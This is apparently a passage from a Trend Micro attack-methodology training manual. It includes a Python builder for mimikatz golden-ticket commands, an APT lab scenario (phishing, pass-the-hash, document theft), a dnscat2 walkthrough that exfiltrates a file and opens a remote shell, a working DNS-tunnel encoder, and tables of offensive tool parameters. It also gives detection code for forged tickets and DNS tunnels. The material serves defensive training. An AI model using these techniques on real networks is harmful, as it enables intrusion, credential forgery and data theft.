Even though the user does not exist, we were able to list a system directory in step 16. Server never checks the name; it authorises on the SIDs in the ticket's PAC, and the domain SID combined with RID 500 (see step 10) is the domain's built-in Administrator.

Note: As a summary, whoever obtains the domain SID and the NTLM hash of the KRBTGT account can mint a ticket for any name, existing or not, with any privileges. The forged ticket remains valid until the KRBTGT password has been reset twice, because the KDC also accepts tickets encrypted with the previous key.
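Two things a practitioner wants at this point, as an added example for this workshop (not code from Trend Micro or mimikatz): a builder that performs the “drop the last four characters” step from step 10 properly (it strips the RID whatever its length) and refuses a malformed SID or a non-hexadecimal krbtgt hash before either reaches mimikatz; and the classic detection for the ticket just minted, run over Windows 4624 logon records. For a Kerberos logon the name carried in the ticket is compared with the name the directory holds for the logged SID; a ticket minted as krbtgthacker with the RID-500 SID fails that comparison. The directory snapshot and event records are constructed sample data; the domain SID is the one used in the exercise.

```python
"""Golden ticket: validate the inputs, and spot the forged logon afterwards."""
import re

SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+(?:-\d+)?$")
NT_HASH_RE = re.compile(r"^[0-9a-fA-F]{32}$")


def domain_sid(account_sid: str) -> str:
    """Return the domain SID from a domain account SID (S-1-5-21-a-b-c[-RID])."""
    sid = account_sid.strip()
    if not SID_RE.match(sid):
        raise ValueError(f"not a domain account SID: {sid!r}")
    return "-".join(sid.split("-")[:7])      # drops the RID if one is present


def build_golden_command(domain: str, krbtgt_sid: str, krbtgt_nt_hash: str,
                         user: str, rid: int = 500) -> str:
    """Assemble the kerberos::golden line from the values gathered in steps 5 and 7."""
    if not NT_HASH_RE.match(krbtgt_nt_hash):
        raise ValueError("krbtgt NT hash must be exactly 32 hexadecimal characters")
    return (f"kerberos::golden /domain:{domain} /sid:{domain_sid(krbtgt_sid)} "
            f"/rc4:{krbtgt_nt_hash.lower()} /user:{user} /id:{rid} /ptt")


# Constructed directory snapshot (SID -> sAMAccountName) for the exercise domain.
DIRECTORY = {
    "S-1-5-21-1008503936-3139382480-897551679-500": "Administrator",
    "S-1-5-21-1008503936-3139382480-897551679-502": "krbtgt",
    "S-1-5-21-1008503936-3139382480-897551679-1105": "attacker",
}

# Constructed 4624 records: the "New Logon" fields as Server would log them.
EVENTS = [
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "attacker", "TargetDomainName": "ACE202",
     "TargetUserSid": "S-1-5-21-1008503936-3139382480-897551679-1105"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "krbtgthacker", "TargetDomainName": "ACE202.TrendMicro",
     "TargetUserSid": "S-1-5-21-1008503936-3139382480-897551679-500"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "Administrator", "TargetDomainName": "ACE202",
     "TargetUserSid": "S-1-5-21-1008503936-3139382480-897551679-500"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "Administrator", "TargetDomainName": "ACE202",
     "TargetUserSid": "S-1-5-21-1008503936-3139382480-897551679-500"},
]


def find_forged_logons(events, directory) -> list:
    """Flag Kerberos logons whose ticket name does not match the directory name for the SID."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4624 or ev.get("AuthenticationPackageName") != "Kerberos":
            continue
        expected = directory.get(ev["TargetUserSid"])
        if expected is None:
            hits.append((ev["TargetUserName"], "SID not present in directory"))
        elif expected.lower() != ev["TargetUserName"].lower():
            hits.append((ev["TargetUserName"],
                         f"ticket name differs from directory name {expected!r} for this SID"))
    return hits


if __name__ == "__main__":
    # "0" * 32 is a placeholder; paste the real value from hashes.txt.
    print(build_golden_command("ACE202.TrendMicro",
                               "S-1-5-21-1008503936-3139382480-897551679-502",
                               "0" * 32, "krbtgthacker"))
    for name, reason in find_forged_logons(EVENTS, DIRECTORY):
        print(f"suspicious logon as {name}: {reason}")
```

The name/SID comparison only catches tickets minted under an invented name; a ticket forged as /user:Administrator passes it. For that case look at the other artefacts a forged TGT leaves: service ticket requests (4769) from a host with no preceding TGT request (4768), ticket lifetimes beyond domain policy, and RC4 encryption in a domain whose accounts use AES.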



Chapter 4: Final Challenge

Final Challenge
In the final challenge for Advanced Threat Defense - Cybercrime Operations & Attack Methodologies, the student will demonstrate the ability to:
• Infiltrating a target environment
• Exfiltration of documents


Lab 1: Perform an APT Attack

Task
The final challenge consists of two tasks:
• Infiltrate a target network
• Exfiltrate an important document

Environment
The final challenge uses a new environment:

FINAL CHALLENGE: ENVIRONMENT

Virtual Machine    Account    Password
WKS-Harry          harry      @Trend@

FINAL CHALLENGE: LOGIN CREDENTIALS

Background Information
In this exercise, you will be playing the role of a hacker named Harry. Your goal is to look for and
collect important documents from your previous employer who just recently fired you.


Task 1: Infiltrate Subnet 1


Due to an incorrectly sent email from "George@ACE202.TrendMicro", it has come to your
attention that George, a high-ranking employee, has a very important presentation coming up in
a few hours.

Based on the information you have read from the email, George is making last minute changes to
his presentation using data that he's requesting from outsourced developers. These outsourced
developers are using the email address “Instructor@ACE202.TrendMicro” to communicate with.
George also mentioned that he urgently needs the updated version of the "ACE202.Exercise.doc"
file; he will be monitoring his email from the time he sent the email up to one hour prior to his
presentation. He also requested that they use "ACE-202 Exercise" as the subject so he can
immediately spot the email.

Prior to this, since you have worked for this company before, you know the following:
• You know of five computers that you can utilize for this operation.
• The mail server’s IP address is 192.168.33.91.
• Servers of this organization are isolated in their own subnet (192.168.33.0/24).
These servers cannot be accessed from the Internet directly except for the SMTP mail server.
However, George's computer can access a computer named SRV-Door on the server subnet.
• The server, where important documents are stored, is SRV-Doc. This server also belongs to
the same subnet as that of the SRV-Door.
• On the same subnet of the servers is a domain controller, SRV-DC, whose user frequently
connects to the SRV-Doc to upload important files.

Objectives:

Use any of the techniques you've learned from this course to infiltrate the target user's
machine using the resources you have.
• Gain access to George's machine.
• Copy your hacking tools to the infected machine.

Guide Questions:

What is the best point of entry knowing that you have the following at your disposal:
• Email address, name, and IP address of an employee
- Email: George@ACE202.TrendMicro
- Name: George
- IP Address: 172.22.22.61
• Critical information and "human" vector that can be exploited
- George is waiting for an "ACE202.Exercise.doc" file
• Trojan backdoor that grants remote access to an attacker
- Trojan: C:\Tools\replace-sethc-with-cmd.exe


Task 2: Infiltrate Subnet 2 and retrieve Documents


Now that you have access to George's machine, determine how you can infiltrate the internal
network of servers.

You know there are important documents stored on SRV-Doc, particularly a DOCX file. You will
need to find a way to get to the SRV-Doc machine in order to get that specific DOCX file, which
name and location are currently unknown.

There are three computers in the internal network. Since you have worked for this company
before, you know one of your ex-colleagues uses the SRV-DC machine to constantly access the
SRV-Doc machine.

Objectives
Use any of the techniques you've learned from this course to infiltrate the organization's network
and retrieve the DOCX file from the SRV-Doc document server:
• Assume George's identity to gain access to the other resources on the network:
- Sniff for passwords
- Use hash passing
• Gain access to the SRV-Door and/or the SRV-Doc machines:
- Determine if George has access to the machines you want to infiltrate; or
- Assume the identity of other people who have access to the resources you need; or
- Create user accounts that have the credentials you need.
• Copy document files from the SRV-Doc machine and determine which ones are useful.

Guide Questions:
• With access to George's machines, what information can be compromised using your hacking
tools?
- Can you retrieve passwords?
- Do you have ready access to other resources on the network?
• By exploring your options, what errors or roadblocks did you encounter?
Are these errors easily bypassed or solved using any of the techniques you've learned?

Optional Activities

Appendix A: Optional Activities


This appendix contains an optional activity, which can be utilized for C&C communication,
data exfiltration or any other IP communication:
• DNS Tunneling


DNS Tunneling
This optional activity demonstrates how to utilize DNS tunneling.

The important point is that IP traffic of any kind can be encapsulated within the DNS protocol. Attackers use this to hide their communication, such as C&C traffic, lateral movement or data exfiltration, inside a protocol that is almost always allowed out of the network and rarely inspected closely.

For this exercise we use the tool dnscat2 to create a DNS tunnel and perform internal reconnaissance and data exfiltration.

Note: Refer to Appendix B.15 on page 121 for further dnscat2 command and parameter examples.

1. Access the Ubuntu virtual machine.


2. Open a new terminal.
3. Stop the systemd-resolved service with the following command:

sudo systemctl stop systemd-resolved

systemd-resolved runs a stub resolver that listens on UDP port 53 (127.0.0.53). Stopping it frees the port so that the dnscat2 server, which must receive the Victim's DNS queries directly, can bind to port 53.
4. Navigate to “dnscat2/server” folder:

cd dnscat2/server

5. Start dnscat2 server and connect to the domain name supplier.tm. Type the command:

sudo ruby ./dnscat2.rb supplier.tm

6. This will start dnscat2:

DNS TUNNELING: START DNSCAT2 SERVER

7. Switch to the Victim machine.


8. Open Wireshark and select Capture > Start. This will start a packet capture.


9. Open a command prompt and run the commands:

cd Desktop\Exercise\dns_tunneling
dnscat2.exe supplier.tm

10. This will execute dnscat2 with the established domain name to create a session:

DNS TUNNELING: START DNSCAT2 CLIENT

Note: If you encounter issues establishing a connection, such as “Too big”, please ensure the DNS
server service on the server machine is running.

11. Switch to the Ubuntu machine.


12. On the dnscat2 terminal, a new window has been created:

DNS TUNNELING: NEW WINDOW

The line New window created: 1 indicates that a new session has been established.
The dnscat2 UI calls its sessions “windows”. The default window is called the 'main' window.
13. Type the following command to get a list of all available windows:.

window

14. You'll note that there are two windows: window 0 is the main window, and window 1 is the
listener (technically referred to as the “tunnel driver”).

DNS TUNNELING: WINDOW OVERVIEW

15. From any window that accepts commands (main and command sessions), you can type help to
get a list of commands:

help

16. Use the window command to interact with window 1, which is the established session with the
Victim machine:

window -i 1


17. Download a file from Victim into the dnscat2 directory:

download finance.txt

Press <Enter> once completed.

Note: A relative path is resolved against the directory the dnscat2 client was started from, so as given this only finds files next to the client. For files elsewhere, such as the “Downloads” folder, give the full path, start dnscat2 from that directory, or move the files into the dnscat2 directory using a shell.

18. The dnscat2 console on Ubuntu will display the success of the download:

DNS TUNNELING: SUCCESSFUL DOWNLOAD, SERVER CONSOLE

19. The download can also be seen on the dnscat2 console on the Victim machine:

DNS TUNNELING: SUCCESSFUL DOWNLOAD, CLIENT CONSOLE

20. Switch back to Ubuntu machine.


21. Open a new terminal.
Do not close the terminal of dnscat2.
22. Open the downloaded file from the dnscat2 folder:

cat dnscat2/server/finance.txt

23. This should show the contents “This is a sample text”:

DNS TUNNELING: FINANCE.TXT CONTENTS

24. Switch back to the dnscat2 terminal window.


25. Create a new session to access the command prompt of the Victim machine:

shell

26. Once executed, press <CTRL>+<Z> followed by <ENTER> to go back to the main window of
dnscat2.


27. Check the available sessions with the command.

window

28. The output now lists a second session, window 2:

DNS TUNNELING: NEW WINDOW MARKED WITH [*]

The [*] marker means there has been activity in that window since we last looked at it.
29. Interact with the new created session:

window -i 2

30. Run the following commands to confirm whether the shell is executed on the Victim machine:

whoami
ipconfig

31. Both commands will return information about the Victim machine:

DNS TUNNELING: SHELL COMMANDS ON REMOTE MACHINE

32. Go back to the main window of dnscat2 by pressing <CTRL> + <Z> followed by <ENTER>.
33. Switch to the Victim machine.
34. Open Wireshark. We can confirm, by analyzing the recorded packets, that all activities between
dnscat2 client and server were encapsulated within the DNS protocol:

DNS TUNNELING: WIRESHARK PROVES DNS PROTOCOL USAGE


35. Switch back to the Ubuntu machine.


36. Terminate session 2, which is the command prompt on Victim:

kill 2

37. Wait a few seconds for the session to close. It is normal to receive error messages during this process.
38. List the remaining open windows with:

window

39. Interact with window 1 and shut down the tunnel:

window -i 1
shutdown
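What the capture in step 34 actually contains, as an added example for this workshop (not dnscat2's code or wire format; dnscat2 has its own session protocol, this is the minimal form of the mechanism it relies on). The client cannot reach the attacker directly, but it can resolve names: outbound bytes are hex-encoded into the labels of a query name under a domain the attacker is authoritative for (supplier.tm in the exercise), and the server recovers them from the question section of every query that reaches it. suspicious_queries() is the check a defender would run over the same capture: long, high-entropy names piling up under one parent domain. All query names and the benign names are constructed.

```python
"""A minimal DNS tunnel (client encode, server decode) and the matching detection."""
from __future__ import annotations

import math
from collections import Counter

MAX_LABEL = 63     # RFC 1035: a label is at most 63 octets
MAX_NAME = 253     # longest name that fits the 255-octet wire limit
CHUNK_BYTES = 60   # 120 hex characters = two labels, leaving room for sequence number and domain


def encode_chunk(seq: int, payload: bytes, domain: str) -> str:
    """One query name: <seq>.<hex labels>.<domain>. Label and name limits are enforced."""
    hexdata = payload.hex()
    labels = [hexdata[i:i + MAX_LABEL] for i in range(0, len(hexdata), MAX_LABEL)]
    name = ".".join([f"{seq:04x}", *labels, domain])
    if len(name) > MAX_NAME:
        raise ValueError(f"chunk {seq} does not fit in one query name")
    return name


def decode_query(name: str, domain: str) -> tuple[int, bytes]:
    """Server side: strip the tunnel domain, read the sequence number, decode the labels."""
    if not name.endswith("." + domain):
        raise ValueError(f"not a tunnel query: {name}")
    labels = name[: -(len(domain) + 1)].split(".")
    return int(labels[0], 16), bytes.fromhex("".join(labels[1:]))


def tunnel_send(data: bytes, domain: str) -> list[str]:
    """Client side: split data into numbered chunks, one DNS query name each."""
    return [encode_chunk(i, data[off:off + CHUNK_BYTES], domain)
            for i, off in enumerate(range(0, len(data), CHUNK_BYTES))]


def tunnel_receive(queries, domain: str) -> bytes:
    """Reassemble by sequence number; resolvers deliver queries out of order and retry them."""
    chunks = {}
    for q in queries:
        seq, payload = decode_query(q, domain)
        chunks[seq] = payload              # a retried duplicate simply overwrites
    return b"".join(chunks[s] for s in sorted(chunks))


def label_entropy(s: str) -> float:
    """Shannon entropy in bits per character; hex-encoded data sits well above hostnames."""
    counts = Counter(s)
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def suspicious_queries(qnames, min_len: int = 40, min_entropy: float = 3.0) -> list[tuple[str, str]]:
    """Flag (parent domain, name) for names whose subdomain part is long and high-entropy."""
    flagged = []
    for q in qnames:
        parts = q.rstrip(".").split(".")
        parent, sub = ".".join(parts[-2:]), "".join(parts[:-2])
        if len(sub) >= min_len and label_entropy(sub) >= min_entropy:
            flagged.append((parent, q))
    return flagged


# Constructed benign names, as they would appear in the same capture.
BENIGN = ["www.trendmicro.com", "mail.ace202.trendmicro", "time.windows.com"]

if __name__ == "__main__":
    queries = tunnel_send(b"This is a sample text", "supplier.tm")
    for q in queries:
        print(q)
    print(tunnel_receive(reversed(queries), "supplier.tm"))
    print(suspicious_queries(queries + BENIGN))
```

The return path is the answer section: dnscat2 carries server-to-client data in TXT, CNAME or MX records of the reply, which is why the Wireshark capture shows only DNS. For detection, the entropy test is a first filter; in practice it is combined with volume (queries per parent domain per minute) and with the fact that a tunnel's parent domain is resolved far more often than any legitimate name it could plausibly serve.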

Commands & Parameters

Appendix B: Commands & Parameters


This appendix outlines basic commands and parameters for:
• netcat
• Pupy
• net
• gsecdump
• samdump2
• John-the-Ripper
• Powershell Empire
• PsExec
• At
• schtasks
• wmic
• netsh
• wce
• mimikatz
• dnscat2


Netcat
Netcat offers multiple parameters for specific actions:

Parameter    Description
-l           Listen mode (default: client)
-L           Listen harder; only supported on Windows. Forces netcat to keep listening after a client disconnects.
-u           UDP mode (default: TCP)
-p           Port to listen on or connect to, depending on the mode
-e           Program to execute after the connection is established; its STDIN and STDOUT are connected to the socket
-n           Disable DNS lookups of machine names
-z           Zero I/O mode; send no data, just check whether the port accepts a connection (port scanning)
-wN          Timeout; netcat waits N seconds for the connection and stops if it is not established within that time
-v           Verbose; print messages on standard error
-vv          Very verbose; print more details on standard error
NETCAT PARAMETERS

Pupy
Pupy is a popular choice of Remote Access Tool, providing a feature set for establishing C&C communication as well as lateral movement. The project page of Pupy can be found at https://github.com/n1nj4sec/pupy.

Command / Parameter        Description
pupygen.py                 Script to create the remote agent for reverse connections
pupysh.py                  Script to start the Pupy shell, which listens for clients
help                       List available commands in the Pupy shell
info                       List information about current sessions
shell                      Start a remote shell on the target and bring it into the Pupy shell
exec notepad.exe           Execute [process] on the target machine, here notepad.exe
migrate -p explorer.exe    Migrate the Pupy client into a different process for obfuscation, here explorer.exe
getpid                     List the process ID of the Pupy client
sessions                   List all current sessions
sessions -k 1              Kill the session with a specific ID, here 1
PUPY COMMANDS & PARAMETERS


net
The built-in command “net” provides a multitude of different options and parameters. The following table lists examples of how “net” can be utilized:

Parameter                                        Description
net use                                          Connect to network shares
net use X: \\192.168.0.1\share /persistent:yes   Connect to the share \\192.168.0.1\share and map it permanently as drive X: (persistent:yes)
net use X: /delete                               Delete the mapped drive X:
net user                                         Create or delete local users, or display information about a specific user
net user bob test /add                           Add a new user “bob” with password “test”
net user bob /delete                             Delete user “bob”
net user bob                                     Display information about user “bob”
net localgroup                                   Create or delete local groups, or add users to a specific group
net localgroup administrators                    Show information about and the members of the group “administrators”
net localgroup administrators bob /add           Add user “bob” to the administrators group
NET COMMANDS & PARAMETERS

gsecdump
gsecdump dumps password hashes and LSA secrets on Windows operating systems:

Parameter Description
-h display all available parameters
-a dump everything
-s dump hashes from SAM / Active Directory
-l dump LSA secrets
-u dump hashes from active logon sessions
-w dump wifi connections
-S force elevation to SYSTEM

GSECDUMP PARAMETERS


samdump2
samdump2 dumps password hashes from a SAM hive, using the boot key from the SYSTEM hive:

Parameter Description
-h display overview of available parameters
-d display debug information
-l extract all available hashes
-o output the hash dumps into a file
SAMDUMP2 PARAMETERS

John-The-Ripper
John the Ripper can be used to crack password hashes with brute-force or dictionary techniques. The table below lists a few of the important options; they take the form --name=value:

Parameter          Description
no parameter       Display help and list all available options
--format=NAME      Specify the hash format of the input, e.g. nt, raw-md5
--wordlist=FILE    Specify a wordlist to use
--pot=FILE         Specify a pot file other than john.pot
JOHN-THE-RIPPER PARAMETERS


Powershell Empire
PowerShell Empire is a post-exploitation framework: its stagers (loaders) pull the agent into memory on the victim, and modules are executed from there without writing to disk. The project page of PowerShell Empire can be found at https://github.com/EmpireProject/Empire

The table below lists few examples of commands, which can be utilized within Powershell Empire:

Command / Parameter Description


help list available options and help for the currently selected module
info list information and available parameters for the selected module
execute run the currently selected module
shell <command> run a shell command on the remote target
back navigate up one level
set [parameter] [value] set a parameter for a module to a specific value
rename [old] [new] rename agent
listeners display all currently running listeners
uselistener [name] select a specific listener
uselistener <space><tab><tab> list all available listener modules
usestager [name] select a specific stager
usestager <space><tab><tab> list all available stager modules
agents list all currently running agents
interact [agent name] interact with a specific agent connection
usemodule [name] select a specifc module
usemodule <space><tab><tab> list all available modules
POWERSHELL EMPIRE COMMANDS

PsExec
PsExec, from the Sysinternals Suite, allows remote process execution on target machines. Further information can be found at https://docs.microsoft.com/en-us/sysinternals/downloads/psexec.

Parameter                Description
no parameter provided    Help overview of all available parameters
\\computer               Specify the target machine; if omitted the process runs on the local machine. \\* targets all computers in the current domain
-c                       Copy the specified program to the target prior to execution
-h                       Run the process with the account's elevated token, if available
-s                       Run the process as the SYSTEM account
-u                       Specify the user to run the process as
-p                       Specify the password for that user
PSEXEC PARAMETERS


at
The at command schedules tasks on local or remote Windows systems; it has been deprecated in favour of schtasks.

Parameter Description
/? print help for at command
\\computername specify target machine to run task on
time specify time when scheduled task should run
command specify the command to run at scheduled time
/interactive allow the task to interact with desktop session
/delete deletes a task, id has to be specified
/every:[date] run the scheduled task every hour / day / week / month
AT PARAMETERS

B.10 schtasks
schtasks has superseded the at command on newer Windows operating systems.

Parameter                Description
no parameter provided    List all current scheduled tasks
/?                       Display the list of available commands
/RUN                     Run a specific task
/QUERY                   Query information about a specific task
/S                       Specify the remote system
/TN                      Specify the task name to query, run or delete
SCHTASKS PARAMETERS

B.11 wmic
wmic, the Windows Management Instrumentation command-line utility, provides a full feature set to query and manipulate data and processes on Windows operating systems. As the list of options is very extensive, the table below focuses on the parameters used throughout the exercises.

Parameter Description
wmic -? lists all available options for wmic
/node: specify the target machine to connect to
/user: specify the user for the connection
/password: specify the password for the selected user
process call create “name” create and execute a new process “name”
WMIC PARAMETERS


B.12 netsh
The netsh tool is a built-in command line utility for network related configuration.

Command / Parameter                     Description
/?                                      List all available options
advfirewall                             Change settings of the Windows Firewall
advfirewall reset                       Reset the firewall to default settings
advfirewall firewall                    Adjust firewall rules and profiles
portproxy                               Set up a port proxy, i.e. port forwarding
portproxy add                           Add a new port forwarding rule
interface                               Change the configuration of a network interface
interface set interface name=”lan1”     Configure the interface called “lan1”

NETSH COMMANDS & PARAMETERS

B.13 wce
Windows Credentials Editor (wce) dumps password hashes, displays cleartext passwords and performs pass-the-hash on Windows operating systems.

Parameter Description
-? list all available options
-s change current NTLM credentials
-l list all available NTLM credentials
-r same as -l, but refreshes automatically every 5 seconds
-w dump cleartext passwords
-k read kerberos tickets from file
WCE PARAMETERS


B.14 mimikatz
A well known tool, mimikatz can be used to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. mimikatz can also perform pass-the-hash and pass-the-ticket, and build Golden Tickets. The project page can be found at https://github.com/gentilkiwi/mimikatz.

Command / Parameter          Description
privilege::debug             Enable SeDebugPrivilege for the mimikatz process, required to read LSASS memory
coffee                       Display a nicely formatted, hot coffee
kerberos::                   List all available functions of the kerberos module
kerberos::golden             Run the function “golden” (forge a Golden Ticket)
sekurlsa::                   List all available functions of the sekurlsa module
sekurlsa::logonpasswords     Dump credentials from current logon sessions
process::                    List all available functions of the process module
misc::                       List all available functions of the misc module
misc::cmd                    Launch a command prompt
misc::regedit                Launch the registry editor
MIMIKATZ COMMANDS & PARAMETERS

B.15 dnscat2
dnscat2 creates a tunnel over DNS traffic, hiding malicious activity inside a protocol that is almost always allowed through. The project page can be found at https://github.com/iagox86/dnscat2.

Command / Parameter     Description
help                    Display the list of commands available in the current window
window                  List all sessions / windows
window -i 1             Interact with window “1”
download [file]         Download “file” from the client; a relative path is resolved against the client's working directory
shell                   Open a remote shell in a new session / window
kill 1                  Kill the window with id “1”
DNSCAT2 COMMANDS & PARAMETERS


Appendix C: Table of Contents


This appendix lists all items within this document:
• Tables
• Images and screenshots


Table of Contents: Tables

Introduction
Class Setup: Virtual Machine Descriptions ........................................................................ 9
Class Setup: User Credentials ............................................................................................ 9

Point of Entry

Command & Control

Lateral Movement
ophcrack: Accounts with Passwords “not found” ............................................................. 44
MAC and IP Address Mapping ........................................................................................... 49
Privilege Escalation: Process Integrity Level ..................................................................... 61

Final Challenge
Final Challenge: Login Credentials .......................................................................................... 101

Appendix: Optional Activities

Appendix: Commands & Parameters


Netcat Parameters ..................................................................................................................115
Pupy Commands & Parameters ..................................................................................................... 115
net Commands & Parameters ........................................................................................................ 116
gsecdump Parameters ............................................................................................................ 116
Samdump2 Parameters ..................................................................................................................117
John-The-Ripper Parameters .........................................................................................................117
Powershell Empire Commands ............................................................................................... 118
PsExec Parameters .................................................................................................................. 118
AT Parameters ......................................................................................................................... 119
schtasks Parameters ........................................................................................ 119
WMIC Parameters .......................................................................................................... 119
netsh Commands & Parameters ....................................................................................... 120
wce Parameters ................................................................................................................ 120
mimikatz Commands & Parameters ...................................................................................... 121
dnscat2 Commands & Parameters ........................................................................................ 121

Appendix: Table of Contents


Table of Contents: Images and Screenshots

Introduction
Trend Micro Training Cloud Access: Training Area ........................................................... 7
Trend Micro Training Cloud Access: List of RDP Files ................................................... 8
Trend Micro Training Cloud Access: Unknown Publisher Warning ................................... 8
Trend Micro Training Cloud Access: vApp Overview ......................................................... 8
Class Setup: Virtual Environment ...................................................................................... 9
Accessing The Virtual Machines: Open the vApp .............................................................. 10
Accessing the Virtual Machines: vApp Startup.................................................................. 10
Accessing The Virtual Machines: “Virtual Machines” Tab .................................................... 11

Point of Entry
Preparing Email: Preparing RTLO ...................................................................................... 15
Preparing Email: Placing RTLO Character ......................................................................... 15
Preparing Email: Text Changes With RTLO Applied .......................................................... 16
Preparing Email: Set Location For LTRO Character. ......................................................... 16
Preparing Email: Text Changes With LTRO Applied .......................................................... 16
Preparing Email: Rename Payload.exe ................................................................................... 17
Preparing Email: File Renamed ............................................................................................... 17
Preparing Email: Change View of Windows Explorer ............................................................ 17
Sending Email: Account Selection ............................................................................................ 18
Sending Email: Viewing Account Settings ........................................................................ 18
Sending Email: Outgoing Mail Server Settings ..................................................................... 18
Sending Email: Confirm SMTP Settings ............................................................................ 18
Sending Email: Spoofing Email Sender ............................................................................. 19
Sending Email: Attaching Malicious File................................................................................ 19
Sending Email: Malicious Email Received ......................................................................... 20
Sending Email: Saving Attachment ................................................................................... 20
Sending Email: Confirmation of No Malicious Files in %tmp% ........................................ 20
Sending Email: Open Malicious File ....................................................................................... 21

Command & Control


TCP Bind Shell: Start Netcat .............................................................................................. 25
TCP Bind Shell: Established Connection with CMD Passed Through ................................. 26
Reverse Shell: Communication Established ....................................................................... 27
Reverse Shell: Successful Command Execution on Victim ................................................ 27
Pupy Rat: Create Backdoor.exe ......................................................................................... 28
Pupy Rat: Shell Started, Awaiting Incoming Connections ................................................. 29
Pupy Rat: Task Manager Shows Backdoor.exe Running ................................................... 29


Pupy Rat: Pupy Shell Has Received Communication ......................................................... 30


Pupy Rat: Info Output ........................................................................................................ 30
Pupy Rat: Shell Access ..................................................................................................30
Pupy Rat: Migration Successful, New Session Created..................................................... 31
Pupy Rat: Backdoor.exe Not Shown In Task Manager....................................................... 32
Pupy Rat: Task Manager Column Selection ....................................................................... 32
Pupy Rat: Explorer.Exe PID ................................................................................................ 32
Pupy Rat: PID of Current Session ....................................................................................... 32

Lateral Movement
LM & NTLM Hashes: Hashes of Empty Passwords............................................................. 37
LM & NTLM Hashes: LM Hash Case-Insensitive ................................................................. 38
LM & NTLM Hashes: LM Hash 7 Character Split ................................................................ 39
LM & NTLM Hashes: LM Hash 14 Character Limitation ..................................................... 39
LM & NTLM Hashes: Local Security Policy Management .................................................. 40
LM & NTLM Hashes: Security Policy on Windows 7 Preventing LM Hash Being Stored ..................... 41
ophcrack: Select Components To Install ............................................................................ 43
ophcrack: Select PWDUMP File ......................................................................................... 43
ophcrack: Registration of XP free fast Table ................................................................ 44
John-The-Ripper: Brute Force.......................................................................................45
John-The-Ripper: John.pot Stores Successfully Cracked Passwords ............................45
Cain & Abel Installation: WinPcap ..................................................................................... 46
Cain & Abel Installation: Setup WinPcap Driver at Boot ................................................... 46
ARP Cache: Domain Network “Connected” ....................................................................... 47
ARP Cache: Attacker Not Listed Yet............................................................................. 47
ARP Cache: Attacker Is Listed Once Pinged .................................................................. 48
ARP Poisoning: Cain & Abel Enable Sniffer ........................................................................ 48
ARP Poisoning: Sniffer Tab ................................................................................................. 48
ARP Poisoning: Scanning MAC Addresses .................................................................... 48
ARP Poisoning: Scanning All Hosts ..................................................................................... 49
ARP Poisoning: Scan Results ......................................................................................... 49
ARP Poisoning: APR Tab ............................................................................................... 49
ARP Poisoning: Add To List ........................................................................................... 50
ARP Poisoning: Selecting the Targets ........................................................................... 50
ARP Poisoning: Targets Listed ...................................................................................... 50
ARP Poisoning: Start Poisoning ......................................................................................... 51
ARP Poisoning: Passwords Tab ......................................................................................... 51
ARP Poisoning: Displaying Passwords ................................................................................ 52
ARP Poisoning: Stopping Activities .................................................................................... 52
Powershell Empire: Start Screen ....................................................................................... 53
Powershell Empire: Starting Listener ...........................................................................54


Powershell Empire: List of Available Stagers ..................................................................... 54


Powershell Empire: Stager File Exported ........................................................................... 55
Powershell Empire: Contents of LNK File .......................................................................... 55
Powershell Empire: Agent Created .................................................................................... 56
Powershell Empire: List All Active Agents ......................................................................... 56
Powershell Empire: Agent Successfully Renamed ............................................................. 57
Powershell Empire: Executing Remote Shell Commands .................................................. 57
Powershell Empire: Sysinfo Command .............................................................................. 57
Privilege Escalation: Allchecks Module Info ...................................................................... 59
Privilege Escalation: Execute Allchecks Module ........................................................... 60
Privilege Escalation: BypassUAC Module Parameters ....................................................... 60
Privilege Escalation: Execute BypassUAC Module ............................................................ 61
Privilege Escalation: BypassUAC Successful ...................................................................... 61
Privilege Escalation: Establish Connection With Escalated Admin Rights ......................... 62
Privilege Escalation: Schtasks Module Parameters ........................................................... 62
Privilege Escalation: Execute Schtasks Module ................................................................. 63
Privilege Escalation: Back Out From Module Into Agents Selection ................................. 63
Privilege Escalation: Windows 7 Task Scheduler Library ................................................... 63
Privilege Escalation: “Updater” Task Properties................................................................ 64
Privilege Escalation: Inactive Agent Sessions .................................................................... 64
Privilege Escalation: Remote Shell Command Hostname .................................................. 65
Privilege Escalation: Remote Shell Command Whoami..................................................... 65
Privilege Escalation: Powerdump Module Output ............................................................ 66
Privilege Escalation: Reveal User Account Credentials From Memory Using Mimikatz .................... 66
ARP Poisoning: Valid HTTP Website .................................................................................. 67
ARP Poisoning: Padlock On HTTPS Websites ..................................................................... 67
ARP Poisoning: Certificate Details ..................................................................................... 68
ARP Poisoning: Delete Browsing History ........................................................................... 68
ARP Poisoning: HTTP Passwords Successfully Intercepted ..........................................69
ARP Poisoning: Spoofed Website Certificate ...............................................................69
ARP Poisoning: Certificate Errors .................................................................................70
ARP Poisoning: Certificate Details ................................................................................70
ARP Poisoning: Certification Path ........................................................................................... 71
ARP Poisoning: HTTPS Password Successfully Intercepted .............................................. 71
ARP Poisoning: Stopping Activities ......................................................................................... 71
PsExec: Run Ipconfig Remotely .......................................................................................... 72
PsExec: Remotely List Directories ...................................................................................... 73
PsExec: Remote Execution Return Result 0 ....................................................................... 73
PsExec: Attack.txt Was Dropped, Attack.exe Successfully Executed Remotely ................ 73
PsExec: Attack.txt Successfully Deleted ...................................................................... 74
PsExec: Process Owner Changed To System ..................................................................... 75


PsExec: Local Hash Dump With Samdump2 ...................................................................... 75


PsExec: Receive Remote Hash Dumps ............................................................................... 76
PsExec: Event Viewer Displaying Information About PsExeSVC Service ........................... 76
PsExec: Event Viewer Displaying Information on User Log In Status ................................ 77
AT: Copy Attack.exe ..................................................................................................... 78
AT: Successfully Scheduled Task Remotely. ................................................................ 79
AT: Confirm Creation of At1.job ........................................................................................ 79
AT: Remote Task Executed Successful ......................................................................... 79
AT: Scheduled Task History ................................................................................................ 80
WMIC: Executing Attack.exe Remotely ...................................................................................81
WMIC: Display Event Viewer Information ......................................................................... 82
WMIC: Enable WMI Activity Trace And Clear Logs ............................................................ 83
